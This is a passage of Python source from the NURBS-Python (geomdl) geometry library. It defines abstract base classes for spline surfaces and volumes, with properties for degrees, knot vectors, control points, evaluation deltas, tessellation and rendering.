# Check all variables are set before the evaluation
self._check_variables()
if isinstance(param, (int, float)):
param = [float(param) for _ in range(self.pdimension)]
# Check parameters
if self._kv_normalize:
if not utilities.check_params(param):
raise GeomdlException("Parameters should be between 0 and 1")
@abc.abstractmethod
def evaluate_list(self, param_list):
""" Evaluates the curve for an input range of parameters.
.. note::
This is an abstract method and it must be implemented in the subclass.
:param param_list: array of parameters
"""
# Check all parameters are set before the evaluation
self._check_variables()
@abc.abstractmethod
def derivatives(self, u, order, **kwargs):
""" Evaluates the derivatives of the curve at parameter u.
.. note::
This is an abstract method and it must be implemented in the subclass.
:param u: parameter (u)
:type u: float
:param order: derivative order
:type order: int
"""
# Check all variables are set before the curve evaluation
self._check_variables()
# Check parameters
if self._kv_normalize:
if not utilities.check_params([u]):
raise GeomdlException("Parameters should be between 0 and 1")
@six.add_metaclass(abc.ABCMeta)
class Surface(SplineGeometry):
""" Abstract base class for defining spline surfaces.
Surface ABC is inherited from abc.ABCMeta class which is included in Python standard library by default. Due to
differences between Python 2 and 3 on defining a metaclass, the compatibility module ``six`` is employed. Using
``six`` to set metaclass allows users to use the abstract classes in a correct way.
The abstract base classes in this module are implemented using a feature called Python Properties. This feature
allows users to use some of the functions as if they are class fields. You can also consider properties as a
pythonic way to set getters and setters. You will see "getter" and "setter" descriptions on the documentation of
these properties.
The Surface ABC allows users to set the *FindSpan* function to be used in evaluations with ``find_span_func``
keyword as an input to the class constructor. NURBS-Python includes a binary and a linear search variation of the
FindSpan function in the ``helpers`` module.
You may also implement and use your own *FindSpan* function. Please see the ``helpers`` module for details.
Code segment below illustrates a possible implementation of Surface abstract base class:
.. code-block:: python
:linenos:
from geomdl import abstract
class MySurfaceClass(abstract.Surface):
def __init__(self, **kwargs):
super(MySurfaceClass, self).__init__(**kwargs)
# Add your constructor code here
def evaluate(self, **kwargs):
# Implement this function
pass
def evaluate_single(self, uv):
# Implement this function
pass
def evaluate_list(self, uv_list):
# Implement this function
pass
def derivatives(self, u, v, order, **kwargs):
# Implement this function
pass
The properties and functions defined in the abstract base class will be automatically available in the subclasses.
**Keyword Arguments:**
* ``precision``: number of decimal places to round to. *Default: 18*
* ``normalize_kv``: if True, knot vector(s) will be normalized to [0,1] domain. *Default: True*
* ``find_span_func``: default knot span finding algorithm. *Default:* :func:`.helpers.find_span_linear`
"""
def __init__(self, **kwargs):
self._pdim = 2 if not hasattr(self, '_pdim') else self._pdim # number of parametric directions
self._dinit = 0.05 if not hasattr(self, '_dinit') else self._dinit # evaluation delta init value
self._array_type = list if not hasattr(self, '_array_type') else self._array_type
super(Surface, self).__init__(**kwargs)
self._name = "Surface" # descriptor field
self._tsl_component = None # tessellation component
self._trims = self._init_array() # trim curves
@property
def order_u(self):
""" Order for the u-direction.
Defined as ``order = degree + 1``
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets order for the u-direction
:setter: Sets order for the u-direction
:type: int
"""
return self.degree_u + 1
@order_u.setter
def order_u(self, value):
self.degree_u = value - 1
@property
def order_v(self):
""" Order for the v-direction.
Defined as ``order = degree + 1``
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets surface order for the v-direction
:setter: Sets surface order for the v-direction
:type: int
"""
return self.degree_v + 1
@order_v.setter
def order_v(self, value):
self.degree_v = value - 1
@property
def degree(self):
""" Degree for u- and v-directions
:getter: Gets the degree
:setter: Sets the degree
:type: list
"""
return self._degree
@degree.setter
def degree(self, value):
if not isinstance(value, (list, tuple)):
raise ValueError("Please input a list with a length of " + str(self.pdimension))
self.degree_u = value[0]
self.degree_v = value[1]
@property
def degree_u(self):
""" Degree for the u-direction.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets degree for the u-direction
:setter: Sets degree for the u-direction
:type: int
"""
return self._degree[0]
@degree_u.setter
def degree_u(self, value):
val = int(value)
if val <= 0:
raise ValueError("Degree cannot be less than zero")
# Clean up the surface points
self.reset(evalpts=True)
# Set degree u
self._degree[0] = int(value)
@property
def degree_v(self):
""" Degree for the v-direction.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets degree for the v-direction
:setter: Sets degree for the v-direction
:type: int
"""
return self._degree[1]
@degree_v.setter
def degree_v(self, value):
val = int(value)
if val <= 0:
raise ValueError("Degree cannot be less than zero")
# Clean up the surface points
self.reset(evalpts=True)
# Set degree v
self._degree[1] = val
@property
def knotvector(self):
""" Knot vector for u- and v-directions
:getter: Gets the knot vector
:setter: Sets the knot vector
:type: list
"""
return self._knot_vector
@knotvector.setter
def knotvector(self, value):
if not isinstance(value, (list, tuple)):
raise ValueError("Please input a list with a length of " + str(self.pdimension))
self.knotvector_u = value[0]
self.knotvector_v = value[1]
@property
def knotvector_u(self):
""" Knot vector for the u-direction.
The knot vector will be normalized to [0, 1] domain if the class is initialized with ``normalize_kv=True``
argument.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets knot vector for the u-direction
:setter: Sets knot vector for the u-direction
:type: list
"""
return self._knot_vector[0]
@knotvector_u.setter
def knotvector_u(self, value):
if self.degree_u == 0 or self.ctrlpts_size_u == 0:
raise ValueError("Set degree and control points first for the u-direction")
# Check knot vector validity
if not utilities.check_knot_vector(self.degree_u, value, self.ctrlpts_size_u):
raise ValueError("Input is not a valid knot vector for the u-direction")
# Clean up the surface points
self.reset(evalpts=True)
# Set knot vector
self._knot_vector[0] = utilities.normalize_knot_vector(value, decimals=self._precision) \
if self._kv_normalize else value
@property
def knotvector_v(self):
""" Knot vector for the v-direction.
The knot vector will be normalized to [0, 1] domain if the class is initialized with ``normalize_kv=True``
argument.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets knot vector for the v-direction
:setter: Sets knot vector for the v-direction
:type: list
"""
return self._knot_vector[1]
@knotvector_v.setter
def knotvector_v(self, value):
if self.degree_v == 0 or self.ctrlpts_size_v == 0:
raise ValueError("Set degree and control points first for the v-direction")
# Check knot vector validity
if not utilities.check_knot_vector(self.degree_v, value, self.ctrlpts_size_v):
raise ValueError("Input is not a valid knot vector for the v-direction")
# Clean up the surface points
self.reset(evalpts=True)
# Set knot vector
self._knot_vector[1] = utilities.normalize_knot_vector(value, decimals=self._precision) \
if self._kv_normalize else value
@property
def ctrlpts(self):
""" 1-dimensional array of control points.
.. note::
The v index varies first. That is, a row of v control points for the first u value is found first.
Then, the row of v control points for the next u value.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the control points
:setter: Sets the control points
:type: list
"""
return self._control_points
@ctrlpts.setter
def ctrlpts(self, value):
if self.ctrlpts_size_u <= 0 or self.ctrlpts_size_v <= 0:
raise ValueError("Please set the number of control points on the u- and v-directions")
self.set_ctrlpts(value, self.ctrlpts_size_u, self.ctrlpts_size_v)
@property
def ctrlpts_size_u(self):
""" Number of control points for the u-direction.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets number of control points for the u-direction
:setter: Sets number of control points for the u-direction
"""
return self._control_points_size[0]
@ctrlpts_size_u.setter
def ctrlpts_size_u(self, value):
if not isinstance(value, int):
raise TypeError("Number of control points for the u-direction must be an integer number")
if value <= 0:
raise ValueError("Control points size cannot be less than and equal to zero")
# Assume that user is doing this right
self._control_points_size[0] = value
@property
def ctrlpts_size_v(self):
""" Number of control points for the v-direction.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets number of control points on the v-direction
:setter: Sets number of control points on the v-direction
"""
return self._control_points_size[1]
@ctrlpts_size_v.setter
def ctrlpts_size_v(self, value):
if not isinstance(value, int):
raise TypeError("Number of control points on the v-direction must be an integer number")
if value <= 0:
raise ValueError("Control points size cannot be less than and equal to zero")
# Assume that user is doing this right
self._control_points_size[1] = value
@property
def sample_size_u(self):
""" Sample size for the u-direction.
Sample size defines the number of surface points to generate. It also sets the ``delta_u`` property.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets sample size for the u-direction
:setter: Sets sample size for the u-direction
:type: int
"""
return int(1.0 / self.delta_u) + 1
@sample_size_u.setter
def sample_size_u(self, value):
if not isinstance(value, int):
raise ValueError("Sample size must be an integer value")
if (self.knotvector_u is None or len(self.knotvector_u) == 0) or self.degree_u == 0:
warnings.warn("Cannot determine 'delta_u' value. Please set knot vectors and degrees before sample size.")
return
# To make it operate like linspace, we have to know the starting and ending points.
start_u = self.knotvector_u[self.degree_u]
stop_u = self.knotvector_u[-(self.degree_u+1)]
# Set delta values
self.delta_u = (stop_u - start_u) / float(value - 1)
@property
def sample_size_v(self):
""" Sample size for the v-direction.
Sample size defines the number of surface points to generate. It also sets the ``delta_v`` property.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets sample size for the v-direction
:setter: Sets sample size for the v-direction
:type: int
"""
return int(1.0 / self.delta_v) + 1
@sample_size_v.setter
def sample_size_v(self, value):
if not isinstance(value, int):
raise ValueError("Sample size must be an integer value")
if (self.knotvector_v is None or len(self.knotvector_v) == 0) or self.degree_v == 0:
warnings.warn("Cannot determine 'delta_v' value. Please set knot vectors and degrees before sample size.")
return
# To make it operate like linspace, we have to know the starting and ending points.
start_v = self.knotvector_v[self.degree_v]
stop_v = self.knotvector_v[-(self.degree_v+1)]
# Set delta values
self.delta_v = (stop_v - start_v) / float(value - 1)
@property
def sample_size(self):
""" Sample size for both u- and v-directions.
Sample size defines the number of surface points to generate. It also sets the ``delta`` property.
The following figure illustrates the working principles of sample size property:
.. math::
\\underbrace {\\left[ {{u_{start}}, \\ldots ,{u_{end}}} \\right]}_{{n_{sample}}}
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets sample size as a tuple of values corresponding to u- and v-directions
:setter: Sets sample size for both u- and v-directions
:type: int
"""
sample_size_u = int(1.0 / self.delta_u) + 1
sample_size_v = int(1.0 / self.delta_v) + 1
return sample_size_u, sample_size_v
@sample_size.setter
def sample_size(self, value):
if (self.knotvector_u is None or len(self.knotvector_u) == 0) or self.degree_u == 0 or\
(self.knotvector_v is None or len(self.knotvector_v) == 0 or self.degree_v == 0):
warnings.warn("Cannot determine 'delta' value. Please set knot vectors and degrees before sample size.")
return
# To make it operate like linspace, we have to know the starting and ending points.
start_u = self.knotvector_u[self.degree_u]
stop_u = self.knotvector_u[-(self.degree_u+1)]
start_v = self.knotvector_v[self.degree_v]
stop_v = self.knotvector_v[-(self.degree_v+1)]
# Set delta values
self.delta_u = (stop_u - start_u) / float(value - 1)
self.delta_v = (stop_v - start_v) / float(value - 1)
@property
def delta_u(self):
""" Evaluation delta for the u-direction.
Evaluation delta corresponds to the *step size* while ``evaluate()`` function iterates on the knot vector to
generate surface points. Decreasing step size results in generation of more surface points.
Therefore; smaller the delta value, smoother the surface.
Please note that ``delta_u`` and ``sample_size_u`` properties correspond to the same variable with different
descriptions. Therefore, setting ``delta_u`` will also set ``sample_size_u``.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets evaluation delta for the u-direction
:setter: Sets evaluation delta for the u-direction
:type: float
"""
return self._delta[0]
@delta_u.setter
def delta_u(self, value):
# Delta value for surface evaluation should be between 0 and 1
if float(value) <= 0 or float(value) >= 1:
raise ValueError("Surface evaluation delta (u-direction) must be between 0.0 and 1.0")
# Clean up the surface points
self.reset(evalpts=True)
# Set new delta value
self._delta[0] = float(value)
@property
def delta_v(self):
""" Evaluation delta for the v-direction.
Evaluation delta corresponds to the *step size* while ``evaluate()`` function iterates on the knot vector to
generate surface points. Decreasing step size results in generation of more surface points.
Therefore; smaller the delta value, smoother the surface.
Please note that ``delta_v`` and ``sample_size_v`` properties correspond to the same variable with different
descriptions. Therefore, setting ``delta_v`` will also set ``sample_size_v``.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets evaluation delta for the v-direction
:setter: Sets evaluation delta for the v-direction
:type: float
"""
return self._delta[1]
@delta_v.setter
def delta_v(self, value):
# Delta value for surface evaluation should be between 0 and 1
if float(value) <= 0 or float(value) >= 1:
raise ValueError("Surface evaluation delta (v-direction) should be between 0.0 and 1.0")
# Clean up the surface points
self.reset(evalpts=True)
# Set new delta value
self._delta[1] = float(value)
@property
def delta(self):
""" Evaluation delta for both u- and v-directions.
Evaluation delta corresponds to the *step size* while ``evaluate()`` function iterates on the knot vector to
generate surface points. Decreasing step size results in generation of more surface points.
Therefore; smaller the delta value, smoother the surface.
Please note that ``delta`` and ``sample_size`` properties correspond to the same variable with different
descriptions. Therefore, setting ``delta`` will also set ``sample_size``.
The following figure illustrates the working principles of the delta property:
.. math::
\\left[{{u_{0}},{u_{start}} + \\delta ,({u_{start}} + \\delta ) + \\delta , \\ldots ,{u_{end}}} \\right]
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets evaluation delta as a tuple of values corresponding to u- and v-directions
:setter: Sets evaluation delta for both u- and v-directions
:type: float
"""
return self.delta_u, self.delta_v
@delta.setter
def delta(self, value):
if isinstance(value, (int, float)):
self.delta_u = value
self.delta_v = value
elif isinstance(value, (list, tuple)):
if len(value) == 2:
self.delta_u = value[0]
self.delta_v = value[1]
else:
raise ValueError("Surface requires 2 delta values")
else:
raise ValueError("Cannot set delta. Please input a numeric value or a list or tuple with 2 numeric values")
@property
def tessellator(self):
""" Tessellation component.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the tessellation component
:setter: Sets the tessellation component
"""
return self._tsl_component
@tessellator.setter
def tessellator(self, value):
if not isinstance(value, AbstractTessellate):
warnings.warn("Tessellation component must be an instance of AbstractTessellate class")
return
self._tsl_component = value
@property
def trims(self):
""" Trim curves.
Trim curves are introduced to the surfaces on the parametric space. It should be an array (or list, tuple, etc.)
and they are integrated to the existing visualization system.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the array of trim curves
:setter: Sets the array of trim curves
"""
return self._trims
@trims.setter
def trims(self, value):
# Input validity check
for i, v in enumerate(value):
if not isinstance(v, Geometry):
raise GeomdlException(
"Trim curve must be an instance of abstract.Geometry class",
data=dict(idx=i)
)
self._trims = value
@property
def data(self):
""" Returns a dictionary containing all shape data.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
"""
return dict(
rational=self.rational,
dimension=self.dimension,
degree=self._degree,
knotvector=self._knot_vector,
size=self._control_points_size,
control_points=self._control_points
)
def set_ctrlpts(self, ctrlpts, *args, **kwargs):
""" Sets the control points and checks if the data is consistent.
This method is designed to provide a consistent way to set control points whether they are weighted or not.
It directly sets the control points member of the class, and therefore it doesn't return any values.
The input will be an array of coordinates. If you are working in the 3-dimensional space, then your coordinates
will be an array of 3 elements representing *(x, y, z)* coordinates.
.. note::
The v index varies first. That is, a row of v control points for the first u value is found first.
Then, the row of v control points for the next u value.
:param ctrlpts: input control points as a list of coordinates
:type ctrlpts: list
:param args: number of control points corresponding to each parametric dimension
:type args: tuple[int, int]
"""
# Validate input
for arg, degree in zip(args, self._degree):
if degree <= 0:
raise ValueError("Set the degree first")
if arg < degree + 1:
raise ValueError("Number of control points should be at least degree + 1")
# Clean up the surface and control points
self.reset(evalpts=True, ctrlpts=True)
# Call parent function
super(Surface, self).set_ctrlpts(ctrlpts, *args, **kwargs)
def render(self, **kwargs):
""" Renders the surface using the visualization component.
The visualization component must be set using :py:attr:`~vis` property before calling this method.
Keyword Arguments:
* ``cpcolor``: sets the color of the control points grid
* ``evalcolor``: sets the color of the surface
* ``trimcolor``: sets the color of the trim curves
* ``filename``: saves the plot with the input name
* ``plot``: controls plot window visibility. *Default: True*
* ``animate``: activates animation (if supported). *Default: False*
* ``extras``: adds line plots to the figure. *Default: None*
* ``colormap``: sets the colormap of the surface
The ``plot`` argument is useful when you would like to work on the command line without any window context.
If ``plot`` flag is False, this method saves the plot as an image file (.png file where possible) and disables
plot window popping out. If you don't provide a file name, the name of the image file will be pulled from the
configuration class.
``extras`` argument can be used to add extra line plots to the figure. This argument expects a list of dicts
in the format described below:
.. code-block:: python
:linenos:
[
dict( # line plot 1
points=[[1, 2, 3], [4, 5, 6]], # list of points
name="My line Plot 1", # name displayed on the legend
color="red", # color of the line plot
size=6.5 # size of the line plot
),
dict( # line plot 2
points=[[7, 8, 9], [10, 11, 12]], # list of points
name="My line Plot 2", # name displayed on the legend
color="navy", # color of the line plot
size=12.5 # size of the line plot
)
]
Please note that ``colormap`` argument can only work with visualization classes that support colormaps. As an
example, please see :py:class:`.VisMPL.VisSurfTriangle()` class documentation. This method expects a single
colormap input.
"""
if not self._vis_component:
warnings.warn("No visualization component has been set")
return
cpcolor = kwargs.get('cpcolor', 'blue')
evalcolor = kwargs.get('evalcolor', 'green')
bboxcolor = kwargs.get('bboxcolor', 'darkorange')
trimcolor = kwargs.get('trimcolor', 'black')
filename = kwargs.get('filename', None)
plot_visible = kwargs.get('plot', True)
extra_plots = kwargs.get('extras', None)
animate_plot = kwargs.get('animate', False)
# Get colormap and convert to a list
surf_cmap = kwargs.get('colormap', None)
surf_cmap = [surf_cmap] if surf_cmap else []
# Check all parameters are set
self._check_variables()
# Check if the surface has been evaluated
if self._eval_points is None or len(self._eval_points) == 0:
self.evaluate()
# Clear the visualization component
self._vis_component.clear()
# Add control points
if self._vis_component.mconf['ctrlpts'] == 'points':
self._vis_component.add(ptsarr=self.ctrlpts, name="Control Points", color=cpcolor, plot_type='ctrlpts')
# Add control points as quads
if self._vis_component.mconf['ctrlpts'] == 'quads':
ctrlpts_quads = utilities.make_quad(self.ctrlpts, self.ctrlpts_size_u, self.ctrlpts_size_v)
self._vis_component.add(ptsarr=ctrlpts_quads, name="Control Points", color=cpcolor, plot_type='ctrlpts')
# Add control points as a quad mesh
if self._vis_component.mconf['ctrlpts'] == 'quadmesh':
ctrlpts_quads = utilities.make_quad_mesh(self.ctrlpts, self.ctrlpts_size_u, self.ctrlpts_size_v)
self._vis_component.add(ptsarr=ctrlpts_quads, name="Control Points", color=cpcolor, plot_type='ctrlpts')
# Add surface points
if self._vis_component.mconf['evalpts'] == 'points':
self._vis_component.add(ptsarr=self.evalpts, name=self.name, color=evalcolor, plot_type='evalpts')
# Add surface points as quads
if self._vis_component.mconf['evalpts'] == 'quads':
evalpts_quads = utilities.make_quad(self.evalpts, self.sample_size_u, self.sample_size_v)
self._vis_component.add(ptsarr=evalpts_quads, name=self.name, color=evalcolor, plot_type='evalpts')
# Add surface points as vertices and triangles
if self._vis_component.mconf['evalpts'] == 'triangles':
self.tessellate()
self._vis_component.add(ptsarr=[self.tessellator.vertices, self.tessellator.faces],
name=self.name, color=evalcolor, plot_type='evalpts')
# Visualize the trim curve
for idx, trim in enumerate(self._trims):
self._vis_component.add(ptsarr=self.evaluate_list(trim.evalpts),
name="Trim Curve " + str(idx + 1), color=trimcolor, plot_type='trimcurve')
# Bounding box
self._vis_component.add(ptsarr=self.bbox, name="Bounding Box", color=bboxcolor, plot_type='bbox')
# User-defined plots
if extra_plots is not None:
for ep in extra_plots:
self._vis_component.add(ptsarr=ep['points'], name=ep['name'],
color=(ep['color'], ep['size']), plot_type='extras')
# Data requested by the visualization module
if self._vis_component.mconf['others']:
vis_other = self._vis_component.mconf['others'].split(",")
for vo in vis_other:
vo_clean = vo.strip()
# Send center point of the parametric space to the visualization module
if vo_clean == "midpt":
midprm_u = (max(self.knotvector_u) + min(self.knotvector_u)) / 2.0
midprm_v = (max(self.knotvector_v) + min(self.knotvector_v)) / 2.0
midpt = self.evaluate_single((midprm_u, midprm_v))
self._vis_component.add(ptsarr=[midpt], plot_type=vo_clean)
# Display the figure
if animate_plot:
self._vis_component.animate(fig_save_as=filename, display_plot=plot_visible, colormap=surf_cmap)
else:
self._vis_component.render(fig_save_as=filename, display_plot=plot_visible, colormap=surf_cmap)
def tessellate(self, **kwargs):
""" Tessellates the surface.
Keyword arguments are directly passed to the tessellation component.
"""
# No need to re-tessellate if we have already tessellated the surface
if self._tsl_component.is_tessellated():
return
# Remove duplicate elements from the kwargs dictionary
kwlist = ["size_u", "size_v", "trims"]
for kw in kwlist:
if kw in kwargs:
kwargs.pop(kw)
# Call tessellation component for vertex and triangle generation
self._tsl_component.tessellate(self.evalpts, size_u=self.sample_size_u, size_v=self.sample_size_v,
trims=self.trims, **kwargs)
# Re-evaluate vertex coordinates
for idx in range(len(self._tsl_component.vertices)):
self._tsl_component.vertices[idx].data = self.evaluate_single(self._tsl_component.vertices[idx].uv)
def reset(self, **kwargs):
""" Resets control points and/or evaluated points.
Keyword Arguments:
* ``evalpts``: if True, then resets evaluated points
* ``ctrlpts`` if True, then resets control points
"""
reset_ctrlpts = kwargs.get('ctrlpts', False)
reset_evalpts = kwargs.get('evalpts', False)
if reset_ctrlpts:
self._control_points = self._init_array()
self._control_points_size[0] = 0
self._control_points_size[1] = 0
self._bounding_box = self._init_array()
if reset_evalpts:
self._eval_points = self._init_array()
# Reset vertices and triangles
self._tsl_component.reset()
# Checks whether the surface evaluation is possible or not
def _check_variables(self):
works = True
param_list = []
if self.degree_u == 0:
works = False
param_list.append('degree_u')
if self.degree_v == 0:
works = False
param_list.append('degree_v')
if len(self._control_points) == 0:
works = False
param_list.append('ctrlpts')
if len(self.knotvector_u) == 0:
works = False
param_list.append('knotvector_u')
if len(self.knotvector_v) == 0:
works = False
param_list.append('knotvector_v')
if not works:
raise ValueError("Please set the following variables before evaluation: " + ",".join(param_list))
@abc.abstractmethod
def evaluate(self, **kwargs):
""" Evaluates the parametric surface.
.. note::
This is an abstract method and it must be implemented in the subclass.
"""
# Check all parameters are set before the evaluation
self._check_variables()
@abc.abstractmethod
def evaluate_single(self, param):
""" Evaluates the parametric surface at the given (u, v) parameter.
.. note::
This is an abstract method and it must be implemented in the subclass.
:param param: parameter (u, v)
"""
# Check all variables are set before the evaluation
self._check_variables()
if isinstance(param, (int, float)):
param = [float(param) for _ in range(self.pdimension)]
# Check parameters
if self._kv_normalize:
if not utilities.check_params(param):
raise GeomdlException("Parameters should be between 0 and 1")
@abc.abstractmethod
def evaluate_list(self, param_list):
""" Evaluates the parametric surface for an input range of (u, v) parameters.
.. note::
This is an abstract method and it must be implemented in the subclass.
:param param_list: array of parameters (u, v)
"""
# Check all parameters are set before the evaluation
self._check_variables()
@abc.abstractmethod
def derivatives(self, u, v, order, **kwargs):
""" Evaluates the derivatives of the parametric surface at parameter (u, v).
.. note::
This is an abstract method and it must be implemented in the subclass.
:param u: parameter on the u-direction
:type u: float
:param v: parameter on the v-direction
:type v: float
:param order: derivative order
:type order: int
"""
# Check all variables are set before the evaluation
self._check_variables()
# Check parameters
if self._kv_normalize:
if not utilities.check_params([u, v]):
raise GeomdlException("Parameters should be between 0 and 1")
@six.add_metaclass(abc.ABCMeta)
class Volume(SplineGeometry):
""" Abstract base class for defining spline volumes.
Volume ABC is inherited from abc.ABCMeta class which is included in Python standard library by default. Due to
differences between Python 2 and 3 on defining a metaclass, the compatibility module ``six`` is employed. Using
``six`` to set metaclass allows users to use the abstract classes in a correct way.
The abstract base classes in this module are implemented using a feature called Python Properties. This feature
allows users to use some of the functions as if they are class fields. You can also consider properties as a
pythonic way to set getters and setters. You will see "getter" and "setter" descriptions on the documentation of
these properties.
The Volume ABC allows users to set the *FindSpan* function to be used in evaluations with ``find_span_func``
keyword as an input to the class constructor. NURBS-Python includes a binary and a linear search variation of the
FindSpan function in the ``helpers`` module.
You may also implement and use your own *FindSpan* function. Please see the ``helpers`` module for details.
Code segment below illustrates a possible implementation of Volume abstract base class:
.. code-block:: python
:linenos:
from geomdl import abstract
class MyVolumeClass(abstract.Volume):
def __init__(self, **kwargs):
super(MyVolumeClass, self).__init__(**kwargs)
# Add your constructor code here
def evaluate(self, **kwargs):
# Implement this function
pass
def evaluate_single(self, uvw):
# Implement this function
pass
def evaluate_list(self, uvw_list):
# Implement this function
pass
The properties and functions defined in the abstract base class will be automatically available in the subclasses.
**Keyword Arguments:**
* ``precision``: number of decimal places to round to. *Default: 18*
* ``normalize_kv``: if True, knot vector(s) will be normalized to [0,1] domain. *Default: True*
* ``find_span_func``: default knot span finding algorithm. *Default:* :func:`.helpers.find_span_linear`
"""
def __init__(self, **kwargs):
self._pdim = 3 if not hasattr(self, '_pdim') else self._pdim # number of parametric directions
self._dinit = 0.1 if not hasattr(self, '_dinit') else self._dinit # evaluation delta init value
self._array_type = list if not hasattr(self, '_array_type') else self._array_type
super(Volume, self).__init__(**kwargs)
self._name = "Volume" # descriptor field
@property
def order_u(self):
""" Order for the u-direction.
Defined as ``order = degree + 1``
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the surface order for u-direction
:setter: Sets the surface order for u-direction
:type: int
"""
return self.degree_u + 1
@order_u.setter
def order_u(self, value):
self.degree_u = value - 1
@property
def order_v(self):
""" Order for the v-direction.
Defined as ``order = degree + 1``
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the surface order for v-direction
:setter: Sets the surface order for v-direction
:type: int
"""
return self.degree_v + 1
@order_v.setter
def order_v(self, value):
self.degree_v = value - 1
@property
def order_w(self):
""" Order for the w-direction.
Defined as ``order = degree + 1``
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the surface order for v-direction
:setter: Sets the surface order for v-direction
:type: int
"""
return self.degree_w + 1
@order_w.setter
def order_w(self, value):
self.degree_w = value - 1
@property
def degree(self):
""" Degree for u-, v- and w-directions
:getter: Gets the degree
:setter: Sets the degree
:type: list
"""
return self._degree
@degree.setter
def degree(self, value):
if not isinstance(value, (list, tuple)):
raise ValueError("Please input a list with a length of " + str(self.pdimension))
self.degree_u = value[0]
self.degree_v = value[1]
self.degree_w = value[2]
@property
def degree_u(self):
""" Degree for the u-direction.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets degree for the u-direction
:setter: Sets degree for the u-direction
:type: int
"""
return self._degree[0]
@degree_u.setter
def degree_u(self, value):
val = int(value)
if val <= 0:
raise ValueError("Degree cannot be less than zero")
# Clean up the surface points
self.reset(evalpts=True)
# Set degree u
self._degree[0] = int(value)
@property
def degree_v(self):
""" Degree for the v-direction.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets degree for the v-direction
:setter: Sets degree for the v-direction
:type: int
"""
return self._degree[1]
@degree_v.setter
def degree_v(self, value):
val = int(value)
if val <= 0:
raise ValueError("Degree cannot be less than zero")
# Clean up the surface points
self.reset(evalpts=True)
# Set degree v
self._degree[1] = val
@property
def degree_w(self):
""" Degree for the w-direction.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets degree for the w-direction
:setter: Sets degree for the w-direction
:type: int
"""
return self._degree[2]
@degree_w.setter
def degree_w(self, value):
val = int(value)
if val <= 0:
raise ValueError("Degree cannot be less than zero")
# Clean up the surface points
self.reset(evalpts=True)
# Set degree v
self._degree[2] = val
@property
def knotvector(self):
""" Knot vector for u-, v- and w-directions
:getter: Gets the knot vector
:setter: Sets the knot vector
:type: list
"""
return self._knot_vector
@knotvector.setter
def knotvector(self, value):
if not isinstance(value, (list, tuple)):
raise ValueError("Please input a list with a length of " + str(self.pdimension))
self.knotvector_u = value[0]
self.knotvector_v = value[1]
self.knotvector_w = value[2]
@property
def knotvector_u(self):
""" Knot vector for the u-direction.
The knot vector will be normalized to [0, 1] domain if the class is initialized with ``normalize_kv=True``
argument.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets knot vector for the u-direction
:setter: Sets knot vector for the u-direction
:type: list
"""
return self._knot_vector[0]
@knotvector_u.setter
def knotvector_u(self, value):
if self.degree_u == 0 or self.ctrlpts_size_u == 0:
raise ValueError("Set degree and control points first on the u-direction")
# Check knot vector validity
if not utilities.check_knot_vector(self.degree_u, value, self.ctrlpts_size_u):
raise ValueError("Input is not a valid knot vector on the u-direction")
# Clean up the surface points
self.reset(evalpts=True)
# Set knot vector
self._knot_vector[0] = utilities.normalize_knot_vector(value, decimals=self._precision) \
if self._kv_normalize else value
@property
def knotvector_v(self):
""" Knot vector for the v-direction.
The knot vector will be normalized to [0, 1] domain if the class is initialized with ``normalize_kv=True``
argument.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets knot vector for the v-direction
:setter: Sets knot vector for the v-direction
:type: list
"""
return self._knot_vector[1]
@knotvector_v.setter
def knotvector_v(self, value):
if self.degree_v == 0 or self.ctrlpts_size_v == 0:
